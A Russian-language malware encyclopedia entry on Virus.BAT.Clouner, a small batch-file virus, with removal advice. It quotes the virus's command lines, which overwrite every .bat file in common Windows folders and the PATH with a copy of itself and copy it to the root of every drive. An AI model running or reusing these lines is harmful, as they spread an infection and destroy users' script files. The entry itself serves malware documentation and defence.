Virus.BAT.Clouner
Материал из Total Malware Info
Virus.BAT.Clouner Вредоносная программа-вирус. Программа является файлом командного интерпретатора. Имеет размер 470 байт.
Деструктивная активность
Файл содержит в себе следующие строки:
for %%. in (*.bat ..\*.bat c:\mydocu~1\*.bat %windir%\*.bat %path%\*.bat %windir%\desktop\*.bat %windir%\command\ebd\*.bat %windir%\system\*.bat) do attrib -r -h -s -a %%.
Данная строка разыскивает все ".bat"-файлы в текущем каталоге, родительском относительно текущего, каталогах "мои документы", Windows, системный каталог Windows, каталог рабочего стола, а так же во всех каталогах, указанных в переменной %path%:
c:\mydocu~1\ %windir%\ %path%\ %windir%\desktop\ %windir%\command\ebd\ %windir%\system\
После чего меняет атрибуты найденных файлов таким образом, чтобы получить возможность переписать их содержимое, копией своего вредоносного кода.
for %%. in (*.bat ..\*.bat c:\mydocu~1\*.bat %windir%\*.bat %path%\*.bat %windir%\desktop\*.bat %windir%\command\ebd\*.bat %windir%\system\*.bat) do copy %0 %%. /y
Данная строка заменяет копией вредоносного кода содержимое всех ".bat"-файлов в перечисленных выше папках.
for %%. in (d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z;a) do %comspec% nul /f /c if exist %%.:\nul copy %0 %%.:\_tmphist.bat /y
Данная строка копирует вредоносную программу под именем "_tmphist.bat" в корневые каталоги всех логических дисков компьютера жертвы.
Рекомендации по удалению
Если ваш компьютер не был защищен антивирусом и оказался заражен данной вредоносной программой, то для её удаления необходимо выполнить следующие действия:
- Удалить оригинальный файл вируса (его расположение на зараженном компьютере зависит от способа, которым программа попала на компьютер).
- Удалить все ".bat"-файлы в папках:
c:\mydocu~1\ %windir%\ %path%\ %windir%\desktop\ %windir%\command\ebd\ %windir%\system\
А так же текущей и родительской, относительно текущей. Это может привести к неработоспособности системы.
